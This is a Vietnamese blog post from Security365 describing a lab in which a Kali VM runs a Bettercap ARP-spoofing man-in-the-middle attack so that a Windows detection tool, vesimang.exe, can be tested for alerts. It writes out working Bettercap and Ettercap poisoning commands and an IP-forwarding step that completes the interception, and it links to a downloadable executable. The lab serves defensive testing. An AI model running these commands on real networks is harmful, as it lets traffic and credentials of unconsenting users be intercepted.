Test Lab Security365 – Thử nghiệm phát hiện ARP Spoofing

by Security365 | 09/08/2025 | Lượt xem: 107

Test Lab Security365 – Thử nghiệm phát hiện ARP Spoofing

Mục tiêu: Mô phỏng tấn công MITM bằng Bettercap để phát hiện hacker qua tool VESIMANG – không phải để chụp mật khẩu hay nghe lén.

Dwonlaod tool CyberGuardv1 https://drive.google.com/drive/folders/1KCDJblGIXn2oUNEqo1Zoo5cinWZ-qsbn?usp=sharing

1. Chuẩn bị

Máy victim  (Windows thật – chạy vesimang.exe) hay sau này là máy của các bạn trên công ty, cơ quan hay laptop xài trong quán cà phê

  1. Cài Npcap (bật WinPcap Compatible Mode khi cài), có trong mục download.
  2. Chạy vesimang.exe bằng Run as Administrator.
  3. Nhấn Unlock Gateway ARP (nếu trước đó đã Lock vì khi lock máy sẽ được bảo vệ nên không có tác dụng dò tìm).
  4. Nhấn Start ARP Monitor và giữ cửa sổ mở.

Máy tấn công (Kali Linux VM – chế độ Bridge)

  1.  Đặt Network Adapter = Bridged (cùng VLAN/subnet với Windows).
    Lấy IP: ip -4 a (Ví dụ: 192.168.1.50)
  2. Xác định gateway: ip route | grep default (Ví dụ: 192.168.1.1)
  3. Lấy IP của máy nạn nhân (Windows): arp -an (Hoặc ping trước để hiện ARP)

2. Chạy Bettercap

1

sudo bettercap -iface eth0

Trong console Bettercap:

1

2

3

4

set arp.spoof.targets                 # Ví dụ: 192.168.1.1ạn_nhân>

set arp.spoof.internal true           # Đầu độc cả victim và gateway

arp.spoof on

net.probe on

 Mẹo: Nếu card mạng không phải eth0, dùng:

 

ip link

để xem tên đúng (có thể là ens33enp0s3, v.v.).

3. Kết quả mong đợi trên VESIMANG

Bạn sẽ thấy popup cảnh báo và dòng vàng trong bảng với một hoặc nhiều thông báo (nếu không thấy gì và trên máy hacker nó vẫn chộp được thông tin nhạy cảm của máy victim thì thảo luận trên nhóm Security365 để đưa ra giải pháp xử lý:

  • Gateway MAC changed
  • IP  switched MAC
  • Gratuitous ARP for gateway detected
  • (Có thể) High ARP rate from

4. Nếu không thấy cảnh báo, kiểm tra:

  • Kali đang NAT → đổi sang Bridged.
  • Kiểm tra subnet: ipconfig # trên Windows ip -4 a # trên Kali
  • Chạy vesimang.exe bằng Admin, kiểm tra Npcap.
  • Tắt chế độ AP/Wi-Fi Isolation trên router.
  • Kiểm tra trạng thái Bettercap: arp.spoof status
  • Thử Ettercap: sudo ettercap -T -M arp:remote // //ạn_nhân>
  • Kiểm tra đúng tên iface: ip link
  • (Không bắt buộc) Bật IP forwarding để MITM hoàn chỉnh: sudo sysctl -w net.ipv4.ip_forward=1

5. Dừng và làm sạch

  • Dừng Bettercap: arp.spoof off quit
  • Xoá cache ARP trên Windows: arp -d *
  • Xoá cache ARP trên Kali: sudo ip -s -s neigh flush all

 

Nâng Cao Kiến Thức & Kỹ Năng An Toàn Thông Tin với Tủ Sách Bảo Mật Security365:
https://elearning.security365.vn/category/tu-sachsecurity365

Chia sẽ kết quả hay thảo luận trên nhóm Security365 tại https://www.facebook.com/groups/1716061738637468

 

Bài viết cùng danh mục
Chia sẻ
Danh mục bài viết
Bài viết nổi bật
Bài viết mới nhất